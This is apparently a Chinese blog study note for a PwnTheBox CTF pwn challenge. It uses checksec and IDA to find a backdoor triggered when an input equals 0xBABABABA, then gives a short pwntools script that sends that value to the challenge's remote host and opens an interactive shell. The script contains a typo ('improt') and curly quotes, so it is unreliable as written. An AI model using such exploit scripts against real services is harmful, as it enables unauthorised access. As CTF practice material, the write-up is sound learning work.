PwnTheBox pwn题学习笔记

本文介绍了如何使用IDA64进行文件分析,通过checksec检查保护措施,并展示了反编译后的C代码。重点在于理解当buf值为0xBABABABA时触发的backdoor函数,以及编写exploit的过程。最终给出了使用Python的pwn库发送payload并进行交互的exploit代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

tutorial1

我们拿到手一个文件后使用Ubuntu,用file来查看一下文件格式。

文件为64-bit,我们打开IDA64,并将文件拖进去。 checksec命令可以用来查看该文件有哪些保护措施。

接下来是IDA反编译之后的伪c代码 ,然后 查看mijie

-1162167622转化成16进制后为0xBABABABA

当buf的值为0xBABABABA时,函数会跳转到backdoor函数

我们双击backdoor可以得到

接下来写exploit

from pwn improt *
context(log_level='debug')
p = remote(“redirect.do-not-trust.hacking.run”,10468)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值